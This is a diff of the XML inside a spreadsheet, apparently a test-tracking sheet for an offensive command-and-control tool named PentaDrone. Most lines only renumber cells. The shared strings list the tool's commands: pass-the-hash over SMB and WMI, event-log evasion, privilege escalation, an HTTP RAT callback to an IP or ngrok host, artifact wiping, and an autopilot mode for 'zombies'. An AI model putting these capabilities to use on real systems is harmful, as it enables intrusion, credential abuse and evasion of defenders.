         <v>86</v>
       </c>
       <c r="B87" t="s">
-        <v>75</v>
+        <v>70</v>
       </c>
       <c r="C87" s="1" t="s">
-        <v>157</v>
+        <v>145</v>
       </c>
       <c r="E87" t="s">
-        <v>157</v>
-      </c>
-    </row>
-    <row r="88" spans="1:5" x14ac:dyDescent="0.25">
+        <v>145</v>
+      </c>
+    </row>
+    <row r="88" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A88">
         <v>87</v>
       </c>
       <c r="B88" t="s">
-        <v>73</v>
+        <v>68</v>
       </c>
       <c r="C88" s="1" t="s">
-        <v>167</v>
+        <v>154</v>
       </c>
       <c r="E88" t="s">
-        <v>159</v>
-      </c>
-    </row>
-    <row r="89" spans="1:5" x14ac:dyDescent="0.25">
+        <v>147</v>
+      </c>
+    </row>
+    <row r="89" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A89">
         <v>88</v>
       </c>
       <c r="B89" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="C89" s="1" t="s">
-        <v>168</v>
+        <v>155</v>
       </c>
       <c r="E89" t="s">
-        <v>161</v>
-      </c>
-    </row>
-    <row r="90" spans="1:5" x14ac:dyDescent="0.25">
+        <v>148</v>
+      </c>
+    </row>
+    <row r="90" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A90">
         <v>89</v>
       </c>
       <c r="B90" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="C90" t="s">
-        <v>169</v>
+        <v>156</v>
       </c>
       <c r="E90" t="s">
-        <v>229</v>
-      </c>
-    </row>
-    <row r="91" spans="1:5" x14ac:dyDescent="0.25">
+        <v>215</v>
+      </c>
+    </row>
+    <row r="91" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A91">
         <v>90</v>
       </c>
       <c r="B91" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="C91" t="s">
-        <v>170</v>
+        <v>157</v>
       </c>
       <c r="E91" t="s">
-        <v>162</v>
-      </c>
-    </row>
-    <row r="92" spans="1:5" x14ac:dyDescent="0.25">
+        <v>149</v>
+      </c>
+    </row>
+    <row r="92" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A92">
         <v>91</v>
       </c>
       <c r="B92" t="s">
-        <v>68</v>
+        <v>63</v>
       </c>
       <c r="C92" s="1" t="s">
-        <v>230</v>
+        <v>216</v>
       </c>
       <c r="E92" t="s">
-        <v>234</v>
-      </c>
-    </row>
-    <row r="93" spans="1:5" x14ac:dyDescent="0.25">
+        <v>219</v>
+      </c>
+    </row>
+    <row r="93" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A93">
         <v>92</v>
       </c>
       <c r="B93" t="s">
-        <v>73</v>
+        <v>68</v>
       </c>
       <c r="C93" s="1" t="s">
-        <v>232</v>
+        <v>217</v>
       </c>
       <c r="E93" t="s">
-        <v>231</v>
-      </c>
-    </row>
-    <row r="94" spans="1:5" x14ac:dyDescent="0.25">
+        <v>256</v>
+      </c>
+    </row>
+    <row r="94" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A94">
         <v>93</v>
       </c>
       <c r="B94" t="s">
-        <v>75</v>
+        <v>70</v>
       </c>
       <c r="C94" s="1" t="s">
-        <v>245</v>
+        <v>229</v>
       </c>
       <c r="E94" t="s">
-        <v>248</v>
-      </c>
-    </row>
-    <row r="95" spans="1:5" x14ac:dyDescent="0.25">
+        <v>232</v>
+      </c>
+    </row>
+    <row r="95" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A95">
         <v>94</v>
       </c>
       <c r="B95" t="s">
-        <v>69</v>
+        <v>64</v>
       </c>
       <c r="C95" s="1" t="s">
-        <v>247</v>
+        <v>231</v>
       </c>
       <c r="E95" t="s">
-        <v>246</v>
-      </c>
-    </row>
-    <row r="96" spans="1:5" x14ac:dyDescent="0.25">
+        <v>230</v>
+      </c>
+    </row>
+    <row r="96" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A96">
         <v>95</v>
       </c>
       <c r="B96" t="s">
-        <v>71</v>
+        <v>66</v>
       </c>
       <c r="C96" s="1" t="s">
-        <v>250</v>
+        <v>234</v>
       </c>
       <c r="E96" t="s">
-        <v>249</v>
-      </c>
-    </row>
-    <row r="97" spans="1:5" x14ac:dyDescent="0.25">
+        <v>233</v>
+      </c>
+    </row>
+    <row r="97" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A97">
         <v>96</v>
       </c>
       <c r="B97" t="s">
-        <v>68</v>
+        <v>63</v>
       </c>
       <c r="C97" s="1" t="s">
-        <v>252</v>
+        <v>236</v>
       </c>
       <c r="E97" t="s">
-        <v>253</v>
-      </c>
-    </row>
-    <row r="98" spans="1:5" x14ac:dyDescent="0.25">
+        <v>237</v>
+      </c>
+    </row>
+    <row r="98" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
       <c r="A98">
         <v>97</v>
       </c>
       <c r="B98" t="s">
-        <v>71</v>
+        <v>66</v>
       </c>
       <c r="C98" s="1" t="s">
-        <v>254</v>
+        <v>238</v>
       </c>
       <c r="E98" t="s">
-        <v>251</v>
+        <v>235</v>
       </c>
     </row>
     <row r="99" spans="1:5" x14ac:dyDescent="0.25">
@@ -3959,17 +4085,64 @@
         <v>98</v>
       </c>
       <c r="B99" t="s">
-        <v>81</v>
+        <v>75</v>
       </c>
       <c r="C99" s="1" t="s">
-        <v>173</v>
+        <v>160</v>
       </c>
       <c r="E99" t="s">
-        <v>255</v>
+        <v>239</v>
+      </c>
+    </row>
+    <row r="100" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="A100">
+        <v>99</v>
+      </c>
+      <c r="B100" t="s">
+        <v>64</v>
+      </c>
+      <c r="C100" s="1" t="s">
+        <v>241</v>
+      </c>
+      <c r="D100" s="6" t="s">
+        <v>58</v>
+      </c>
+      <c r="E100" t="s">
+        <v>242</v>
+      </c>
+    </row>
+    <row r="101" spans="1:5" hidden="1" x14ac:dyDescent="0.25">
+      <c r="A101">
+        <v>100</v>
+      </c>
+      <c r="B101" t="s">
+        <v>65</v>
+      </c>
+      <c r="C101" s="1" t="s">
+        <v>251</v>
+      </c>
+      <c r="E101" t="s">
+        <v>252</v>
+      </c>
+    </row>
+    <row r="102" spans="1:5" x14ac:dyDescent="0.25">
+      <c r="B102" t="s">
+        <v>75</v>
+      </c>
+      <c r="C102" s="1" t="s">
+        <v>264</v>
+      </c>
+      <c r="E102" t="s">
+        <v>263</v>
       </c>
     </row>
   </sheetData>
-  <autoFilter ref="A1:E99" xr:uid="{873B811C-17E0-44D6-BE49-771EF1C74A88}">
+  <autoFilter ref="A1:E101" xr:uid="{873B811C-17E0-44D6-BE49-771EF1C74A88}">
+    <filterColumn colId="1">
+      <filters>
+        <filter val="Privilege Escalation"/>
+      </filters>
+    </filterColumn>
     <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:E79">
       <sortCondition ref="A1"/>
     </sortState>
@@ -4285,10 +4458,10 @@
   <sheetData>
     <row r="1" spans="1:18" s="4" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A1" s="2" t="s">
-        <v>72</v>
+        <v>67</v>
       </c>
       <c r="B1" s="5" t="s">
-        <v>60</v>
+        <v>55</v>
       </c>
       <c r="C1" s="2"/>
       <c r="D1" s="2"/>
@@ -4304,268 +4477,268 @@
     </row>
     <row r="2" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A2" t="s">
-        <v>117</v>
+        <v>105</v>
       </c>
       <c r="B2" s="6" t="s">
-        <v>132</v>
+        <v>120</v>
       </c>
     </row>
     <row r="3" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A3" t="s">
-        <v>118</v>
+        <v>106</v>
       </c>
       <c r="B3" s="6" t="s">
-        <v>133</v>
+        <v>121</v>
       </c>
     </row>
     <row r="4" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A4" t="s">
-        <v>134</v>
+        <v>122</v>
       </c>
       <c r="B4" s="6" t="s">
-        <v>133</v>
+        <v>121</v>
       </c>
     </row>
     <row r="5" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A5" t="s">
-        <v>119</v>
+        <v>107</v>
       </c>
       <c r="B5" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="N5" t="s">
-        <v>66</v>
+        <v>61</v>
       </c>
       <c r="R5" t="s">
-        <v>42</v>
+        <v>37</v>
       </c>
     </row>
     <row r="6" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A6" t="s">
-        <v>120</v>
+        <v>108</v>
       </c>
       <c r="B6" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="N6" t="s">
-        <v>67</v>
+        <v>62</v>
       </c>
       <c r="O6" t="s">
-        <v>43</v>
+        <v>38</v>
       </c>
       <c r="P6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="R6" t="s">
-        <v>44</v>
+        <v>39</v>
       </c>
     </row>
     <row r="7" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A7" t="s">
+        <v>109</v>
+      </c>
+      <c r="B7" s="6" t="s">
+        <v>58</v>
+      </c>
+      <c r="C7" t="s">
+        <v>123</v>
+      </c>
+      <c r="N7" t="s">
+        <v>75</v>
+      </c>
+      <c r="P7" t="s">
         <v>121</v>
       </c>
-      <c r="B7" s="6" t="s">
-        <v>63</v>
-      </c>
-      <c r="C7" t="s">
-        <v>135</v>
-      </c>
-      <c r="N7" t="s">
-        <v>81</v>
-      </c>
-      <c r="P7" t="s">
-        <v>133</v>
-      </c>
       <c r="R7" t="s">
-        <v>45</v>
+        <v>40</v>
       </c>
     </row>
     <row r="8" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A8" t="s">
-        <v>122</v>
+        <v>110</v>
       </c>
       <c r="B8" s="6" t="s">
+        <v>58</v>
+      </c>
+      <c r="N8" t="s">
         <v>63</v>
       </c>
-      <c r="N8" t="s">
-        <v>68</v>
-      </c>
       <c r="P8" t="s">
-        <v>132</v>
+        <v>120</v>
       </c>
       <c r="R8" t="s">
-        <v>46</v>
+        <v>41</v>
       </c>
     </row>
     <row r="9" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A9" t="s">
-        <v>123</v>
+        <v>111</v>
       </c>
       <c r="B9" s="6" t="s">
-        <v>132</v>
+        <v>120</v>
       </c>
       <c r="N9" t="s">
-        <v>69</v>
+        <v>64</v>
       </c>
       <c r="R9" t="s">
-        <v>48</v>
+        <v>43</v>
       </c>
     </row>
     <row r="10" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A10" t="s">
-        <v>124</v>
+        <v>112</v>
       </c>
       <c r="B10" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="N10" t="s">
-        <v>70</v>
+        <v>65</v>
       </c>
       <c r="O10" t="s">
-        <v>47</v>
+        <v>42</v>
       </c>
       <c r="R10" t="s">
-        <v>49</v>
+        <v>44</v>
       </c>
     </row>
     <row r="11" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A11" t="s">
-        <v>125</v>
+        <v>113</v>
       </c>
       <c r="B11" s="6" t="s">
-        <v>133</v>
+        <v>121</v>
       </c>
       <c r="N11" t="s">
-        <v>71</v>
+        <v>66</v>
       </c>
       <c r="R11" t="s">
-        <v>50</v>
+        <v>45</v>
       </c>
     </row>
     <row r="12" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A12" t="s">
-        <v>126</v>
+        <v>114</v>
       </c>
       <c r="B12" s="6" t="s">
-        <v>132</v>
+        <v>120</v>
       </c>
       <c r="C12" t="s">
-        <v>136</v>
+        <v>124</v>
       </c>
       <c r="N12" t="s">
-        <v>72</v>
+        <v>67</v>
       </c>
       <c r="R12" t="s">
-        <v>51</v>
+        <v>46</v>
       </c>
     </row>
     <row r="13" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A13" t="s">
-        <v>127</v>
+        <v>115</v>
       </c>
       <c r="B13" s="6" t="s">
-        <v>133</v>
+        <v>121</v>
       </c>
       <c r="C13" t="s">
-        <v>137</v>
+        <v>125</v>
       </c>
       <c r="N13" t="s">
-        <v>73</v>
+        <v>68</v>
       </c>
       <c r="R13" t="s">
-        <v>52</v>
+        <v>47</v>
       </c>
     </row>
     <row r="14" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A14" t="s">
-        <v>128</v>
+        <v>116</v>
       </c>
       <c r="B14" s="6" t="s">
-        <v>133</v>
+        <v>121</v>
       </c>
       <c r="C14" t="s">
-        <v>139</v>
+        <v>127</v>
       </c>
       <c r="N14" t="s">
-        <v>74</v>
+        <v>69</v>
       </c>
       <c r="R14" t="s">
-        <v>53</v>
+        <v>48</v>
       </c>
     </row>
     <row r="15" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A15" t="s">
-        <v>129</v>
+        <v>117</v>
       </c>
       <c r="B15" s="6" t="s">
-        <v>132</v>
+        <v>120</v>
       </c>
       <c r="C15" t="s">
-        <v>138</v>
+        <v>126</v>
       </c>
       <c r="N15" t="s">
-        <v>75</v>
+        <v>70</v>
       </c>
       <c r="R15" t="s">
-        <v>54</v>
+        <v>49</v>
       </c>
     </row>
     <row r="16" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A16" t="s">
-        <v>130</v>
+        <v>118</v>
       </c>
       <c r="B16" s="6" t="s">
-        <v>132</v>
+        <v>120</v>
       </c>
       <c r="N16" t="s">
-        <v>76</v>
+        <v>71</v>
       </c>
       <c r="R16" t="s">
-        <v>55</v>
+        <v>50</v>
       </c>
     </row>
     <row r="17" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A17" t="s">
-        <v>131</v>
+        <v>119</v>
       </c>
       <c r="B17" s="6" t="s">
-        <v>133</v>
+        <v>121</v>
       </c>
       <c r="C17" t="s">
-        <v>140</v>
+        <v>128</v>
       </c>
       <c r="N17" t="s">
-        <v>77</v>
+        <v>72</v>
       </c>
       <c r="R17" t="s">
-        <v>56</v>
+        <v>51</v>
       </c>
     </row>
     <row r="18" spans="1:18" x14ac:dyDescent="0.25">
       <c r="A18" t="s">
-        <v>155</v>
+        <v>143</v>
       </c>
       <c r="B18" s="6" t="s">
-        <v>63</v>
+        <v>58</v>
       </c>
       <c r="N18" t="s">
-        <v>79</v>
+        <v>73</v>
       </c>
       <c r="R18" t="s">
-        <v>57</v>
+        <v>52</v>
       </c>
     </row>
     <row r="19" spans="1:18" x14ac:dyDescent="0.25">
       <c r="N19" t="s">
-        <v>80</v>
+        <v>74</v>
       </c>
       <c r="R19" t="s">
-        <v>58</v>
+        <v>53</v>
       </c>
     </row>
     <row r="20" spans="1:18" x14ac:dyDescent="0.25">
       <c r="R20" t="s">
-        <v>59</v>
+        <v>54</v>
       </c>
     </row>
     <row r="33" spans="2:2" x14ac:dyDescent="0.25"/>
@@ -4574,7 +4747,7 @@
     <row r="40" spans="2:2" x14ac:dyDescent="0.25"/>
     <row r="56" spans="2:8" x14ac:dyDescent="0.25">
       <c r="H56" t="s">
-        <v>22</v>
+        <v>17</v>
       </c>
     </row>
     <row r="63" spans="2:8" x14ac:dyDescent="0.25"/>

--- a/validate-cmd.xlsx
+++ b/validate-cmd.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\sharelab\pnt\PentaDrone\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{926AA25E-7722-4A32-BC08-0B4D63F0DDE2}" xr6:coauthVersionLast="41" xr6:coauthVersionMax="43" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A1934A3C-68BB-4441-8D4C-76A23FF739D4}" xr6:coauthVersionLast="41" xr6:coauthVersionMax="43" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="1320" yWindow="2850" windowWidth="17700" windowHeight="12720" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
+    <workbookView xWindow="10155" yWindow="195" windowWidth="17700" windowHeight="12720" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
   <sheets>
     <sheet name="Cmde state validation" sheetId="1" r:id="rId1"/>
@@ -18,7 +18,7 @@
     <sheet name="Feuil3" sheetId="3" r:id="rId3"/>
   </sheets>
   <definedNames>
-    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Cmde state validation'!$A$1:$E$101</definedName>
+    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">'Cmde state validation'!$A$1:$E$103</definedName>
     <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'Exec validation'!$A$1:$B$81</definedName>
   </definedNames>
   <calcPr calcId="125725"/>
@@ -358,7 +358,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="474" uniqueCount="265">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="482" uniqueCount="269">
   <si>
     <t xml:space="preserve">  #  !quit   -     Delete all artifacts and clean computer. The end of operations</t>
   </si>
@@ -631,15 +631,6 @@
   </si>
   <si>
     <t># !httprat|212.74.21.23  OR  !httprat|xxxxxx.ngrok.io   (without HTTP/s)</t>
-  </si>
-  <si>
-    <t>#  !pthsmb  Pass the hash</t>
-  </si>
-  <si>
-    <t>#  !pthwmi</t>
-  </si>
-  <si>
-    <t>!enumshare</t>
   </si>
   <si>
     <t>!enumsession</t>
@@ -1173,9 +1164,6 @@
     <t>!logbypass    -   Invoke-phant0m  invisible mode activated against eventviewer</t>
   </si>
   <si>
-    <t>#!enumshare|toto|F8580EAGFH89725  -Enumarate shares, need HASH</t>
-  </si>
-  <si>
     <t>#!enumsession|toto|F8580EAGFH89725 - Enumarate sessions, need HASH</t>
   </si>
   <si>
@@ -1228,6 +1216,30 @@
   </si>
   <si>
     <t>!getsystem</t>
+  </si>
+  <si>
+    <t>!pilot</t>
+  </si>
+  <si>
+    <t xml:space="preserve">!pilot|http://127.0.0.1/www/link/pilot.xml - Used to give a schema to zombies so that they will autopilot. How: they process the .xml file instructions, create and send to C2 the list of pré-formatted commands that they will execute </t>
+  </si>
+  <si>
+    <t>#  !pthwmi - Pass the hash using WMI</t>
+  </si>
+  <si>
+    <t>#  !pthsmb  - Pass the hash using SMB</t>
+  </si>
+  <si>
+    <t>work only with ps greater than 3</t>
+  </si>
+  <si>
+    <t>Need to bypass UAC to be efficient</t>
+  </si>
+  <si>
+    <t>!smbenum</t>
+  </si>
+  <si>
+    <t>#!!smbenum|toto|F8580EAGFH89725  -Enumarate Group,Sessions,Users,shares, need HASH</t>
   </si>
 </sst>
 </file>
@@ -2416,10 +2428,10 @@
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
   <sheetPr codeName="Feuil1" filterMode="1"/>
-  <dimension ref="A1:U102"/>
+  <dimension ref="A1:U103"/>
   <sheetViews>
     <sheetView tabSelected="1" zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
-      <selection activeCell="B102" sqref="B102"/>
+      <selection activeCell="E107" sqref="E107"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="15" x14ac:dyDescent="0.25"/>
@@ -2441,7 +2453,7 @@
         <v>36</v>
       </c>
       <c r="C1" s="3" t="s">
-        <v>214</v>
+        <v>211</v>
       </c>
       <c r="D1" s="5" t="s">
         <v>55</v>
@@ -2469,7 +2481,7 @@
         <v>73</v>
       </c>
       <c r="C2" s="1" t="s">
-        <v>213</v>
+        <v>210</v>
       </c>
       <c r="E2" t="s">
         <v>0</v>
@@ -2483,13 +2495,13 @@
         <v>73</v>
       </c>
       <c r="C3" s="1" t="s">
-        <v>212</v>
+        <v>209</v>
       </c>
       <c r="D3" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E3" t="s">
-        <v>259</v>
+        <v>255</v>
       </c>
     </row>
     <row r="4" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
@@ -2500,13 +2512,13 @@
         <v>73</v>
       </c>
       <c r="C4" s="1" t="s">
-        <v>211</v>
+        <v>208</v>
       </c>
       <c r="D4" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E4" t="s">
-        <v>260</v>
+        <v>256</v>
       </c>
       <c r="Q4" t="s">
         <v>61</v>
@@ -2523,7 +2535,7 @@
         <v>70</v>
       </c>
       <c r="C5" s="1" t="s">
-        <v>210</v>
+        <v>207</v>
       </c>
       <c r="D5" s="6" t="s">
         <v>58</v>
@@ -2552,7 +2564,7 @@
         <v>74</v>
       </c>
       <c r="C6" s="1" t="s">
-        <v>209</v>
+        <v>206</v>
       </c>
       <c r="D6" s="6" t="s">
         <v>58</v>
@@ -2570,7 +2582,7 @@
         <v>40</v>
       </c>
     </row>
-    <row r="7" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+    <row r="7" spans="1:21" x14ac:dyDescent="0.25">
       <c r="A7">
         <v>6</v>
       </c>
@@ -2578,13 +2590,13 @@
         <v>65</v>
       </c>
       <c r="C7" s="1" t="s">
-        <v>208</v>
+        <v>205</v>
       </c>
       <c r="D7" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E7" t="s">
-        <v>255</v>
+        <v>251</v>
       </c>
       <c r="Q7" t="s">
         <v>63</v>
@@ -2604,7 +2616,7 @@
         <v>73</v>
       </c>
       <c r="C8" s="1" t="s">
-        <v>207</v>
+        <v>204</v>
       </c>
       <c r="E8" t="s">
         <v>22</v>
@@ -2613,7 +2625,7 @@
         <v>64</v>
       </c>
       <c r="S8" t="s">
-        <v>142</v>
+        <v>139</v>
       </c>
       <c r="U8" t="s">
         <v>43</v>
@@ -2627,7 +2639,7 @@
         <v>69</v>
       </c>
       <c r="C9" s="1" t="s">
-        <v>206</v>
+        <v>203</v>
       </c>
       <c r="D9" s="6" t="s">
         <v>58</v>
@@ -2653,13 +2665,16 @@
         <v>69</v>
       </c>
       <c r="C10" s="1" t="s">
-        <v>205</v>
+        <v>202</v>
       </c>
       <c r="D10" s="6" t="s">
-        <v>56</v>
+        <v>57</v>
       </c>
       <c r="E10" t="s">
         <v>19</v>
+      </c>
+      <c r="F10" t="s">
+        <v>265</v>
       </c>
       <c r="Q10" t="s">
         <v>66</v>
@@ -2676,7 +2691,7 @@
         <v>69</v>
       </c>
       <c r="C11" s="1" t="s">
-        <v>204</v>
+        <v>201</v>
       </c>
       <c r="D11" s="6" t="s">
         <v>58</v>
@@ -2699,7 +2714,7 @@
         <v>68</v>
       </c>
       <c r="C12" s="1" t="s">
-        <v>203</v>
+        <v>200</v>
       </c>
       <c r="E12" t="s">
         <v>2</v>
@@ -2719,13 +2734,13 @@
         <v>67</v>
       </c>
       <c r="C13" s="1" t="s">
-        <v>202</v>
+        <v>199</v>
       </c>
       <c r="D13" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E13" t="s">
-        <v>243</v>
+        <v>240</v>
       </c>
       <c r="Q13" t="s">
         <v>69</v>
@@ -2742,10 +2757,10 @@
         <v>67</v>
       </c>
       <c r="C14" s="1" t="s">
-        <v>201</v>
+        <v>198</v>
       </c>
       <c r="E14" t="s">
-        <v>244</v>
+        <v>241</v>
       </c>
       <c r="Q14" t="s">
         <v>70</v>
@@ -2762,7 +2777,7 @@
         <v>71</v>
       </c>
       <c r="C15" s="1" t="s">
-        <v>200</v>
+        <v>197</v>
       </c>
       <c r="D15" s="6" t="s">
         <v>58</v>
@@ -2785,10 +2800,10 @@
         <v>74</v>
       </c>
       <c r="C16" s="1" t="s">
-        <v>199</v>
+        <v>196</v>
       </c>
       <c r="E16" t="s">
-        <v>218</v>
+        <v>215</v>
       </c>
       <c r="Q16" t="s">
         <v>72</v>
@@ -2805,10 +2820,10 @@
         <v>67</v>
       </c>
       <c r="C17" s="1" t="s">
-        <v>198</v>
+        <v>195</v>
       </c>
       <c r="D17" s="6" t="s">
-        <v>142</v>
+        <v>139</v>
       </c>
       <c r="E17" t="s">
         <v>4</v>
@@ -2828,7 +2843,7 @@
         <v>73</v>
       </c>
       <c r="C18" s="1" t="s">
-        <v>197</v>
+        <v>194</v>
       </c>
       <c r="D18" s="6" t="s">
         <v>58</v>
@@ -2851,13 +2866,13 @@
         <v>74</v>
       </c>
       <c r="C19" s="1" t="s">
-        <v>103</v>
+        <v>100</v>
       </c>
       <c r="D19" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E19" t="s">
-        <v>102</v>
+        <v>99</v>
       </c>
       <c r="U19" t="s">
         <v>54</v>
@@ -2871,7 +2886,7 @@
         <v>73</v>
       </c>
       <c r="C20" s="1" t="s">
-        <v>196</v>
+        <v>193</v>
       </c>
       <c r="D20" s="6" t="s">
         <v>58</v>
@@ -2880,7 +2895,7 @@
         <v>5</v>
       </c>
     </row>
-    <row r="21" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+    <row r="21" spans="1:21" x14ac:dyDescent="0.25">
       <c r="A21">
         <v>20</v>
       </c>
@@ -2888,13 +2903,13 @@
         <v>65</v>
       </c>
       <c r="C21" s="1" t="s">
+        <v>220</v>
+      </c>
+      <c r="E21" t="s">
         <v>223</v>
       </c>
-      <c r="E21" t="s">
-        <v>226</v>
-      </c>
-    </row>
-    <row r="22" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
+    </row>
+    <row r="22" spans="1:21" x14ac:dyDescent="0.25">
       <c r="A22">
         <v>21</v>
       </c>
@@ -2902,13 +2917,13 @@
         <v>65</v>
       </c>
       <c r="C22" s="1" t="s">
-        <v>222</v>
+        <v>219</v>
       </c>
       <c r="D22" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E22" t="s">
-        <v>227</v>
+        <v>224</v>
       </c>
     </row>
     <row r="23" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
@@ -2919,7 +2934,7 @@
         <v>74</v>
       </c>
       <c r="C23" s="1" t="s">
-        <v>195</v>
+        <v>192</v>
       </c>
       <c r="D23" s="6" t="s">
         <v>58</v>
@@ -2936,16 +2951,16 @@
         <v>62</v>
       </c>
       <c r="C24" s="1" t="s">
-        <v>194</v>
+        <v>191</v>
       </c>
       <c r="D24" s="6" t="s">
         <v>58</v>
       </c>
       <c r="E24" t="s">
-        <v>146</v>
-      </c>
-    </row>
-    <row r="25" spans="1:21" x14ac:dyDescent="0.25">
+        <v>143</v>
+      </c>
+    </row>
+    <row r="25" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A25">
         <v>24</v>
       </c>
@@ -2953,16 +2968,19 @@
         <v>75</v>
       </c>
       <c r="C25" s="1" t="s">
-        <v>262</v>
+        <v>258</v>
       </c>
       <c r="D25" s="6" t="s">
-        <v>56</v>
+        <v>57</v>
       </c>
       <c r="E25" t="s">
-        <v>261</v>
-      </c>
-    </row>
-    <row r="26" spans="1:21" x14ac:dyDescent="0.25">
+        <v>257</v>
+      </c>
+      <c r="F25" t="s">
+        <v>266</v>
+      </c>
+    </row>
+    <row r="26" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A26">
         <v>25</v>
       </c>
@@ -2970,7 +2988,7 @@
         <v>75</v>
       </c>
       <c r="C26" s="1" t="s">
-        <v>193</v>
+        <v>190</v>
       </c>
       <c r="D26" s="6" t="s">
         <v>58</v>
@@ -2979,7 +2997,7 @@
         <v>79</v>
       </c>
     </row>
-    <row r="27" spans="1:21" x14ac:dyDescent="0.25">
+    <row r="27" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A27">
         <v>26</v>
       </c>
@@ -2987,10 +3005,10 @@
         <v>75</v>
       </c>
       <c r="C27" s="1" t="s">
-        <v>192</v>
+        <v>189</v>
       </c>
       <c r="D27" s="6" t="s">
-        <v>56</v>
+        <v>139</v>
       </c>
       <c r="E27" t="s">
         <v>7</v>
@@ -3004,7 +3022,7 @@
         <v>64</v>
       </c>
       <c r="C28" s="1" t="s">
-        <v>191</v>
+        <v>188</v>
       </c>
       <c r="E28" t="s">
         <v>8</v>
@@ -3018,13 +3036,13 @@
         <v>67</v>
       </c>
       <c r="C29" s="1" t="s">
-        <v>190</v>
+        <v>187</v>
       </c>
       <c r="E29" t="s">
         <v>9</v>
       </c>
     </row>
-    <row r="30" spans="1:21" x14ac:dyDescent="0.25">
+    <row r="30" spans="1:21" hidden="1" x14ac:dyDescent="0.25">
       <c r="A30">
         <v>29</v>
       </c>
@@ -3032,7 +3050,7 @@
         <v>75</v>
       </c>
       <c r="C30" s="1" t="s">
-        <v>189</v>
+        <v>186</v>
       </c>
       <c r="E30" t="s">
         <v>23</v>
@@ -3046,10 +3064,10 @@
         <v>66</v>
       </c>
       <c r="C31" s="1" t="s">
